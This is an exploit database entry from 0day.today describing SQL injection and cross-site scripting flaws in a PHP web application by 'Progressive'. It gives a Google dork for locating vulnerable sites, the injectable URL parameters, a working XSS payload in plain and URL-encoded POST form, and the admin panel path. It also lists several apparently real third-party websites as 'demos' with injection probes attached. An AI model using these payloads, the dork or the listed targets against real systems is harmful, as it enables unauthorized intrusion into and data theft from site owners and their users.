[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Progressive SQL Injection / XSS Vulnerabilities

Author
r3nw4
Risk
[
Security Risk High
]
0day-ID
0day-ID-23952
Category
web applications
Date add
04-08-2015
Platform
php
Exploit Title: [Progressive SQL injection+XSS]
# Google Dork: [intext:"Designed & Developed By: Progressive or inurl:"main.php?maid="]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Version: [the lower versions]
# Tested on: [Linux(Debian)]
# Greetz: MuhmadEmad - All Kurdish Hackers - Kurdistan - Peshmarga
-----------------------

SQLi:
site.com/main.php?maid=<SQL>
site.com/main.php?tt=<SQL>

-----------------------

XSS:(All Versions :)
in search field:
"'/>><img src=x onerror=alert(/XSS_HERE/)>

or send POST request to /search.php with this data

search=%22%27%2F%3E%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3E&image.x=0&image.y=0

------------------------

admin panel:
site.com/admin/index.php

------------------------
Demos:

http://www.safeXtyinstyles.com/main.php?maid=141-0%27
http://lovemohXammad.com/main.php?maid=45-0%27
http://trendplXusbeauty.com/main.php?tt=1518%27

#  0day.today [2024-12-26]  #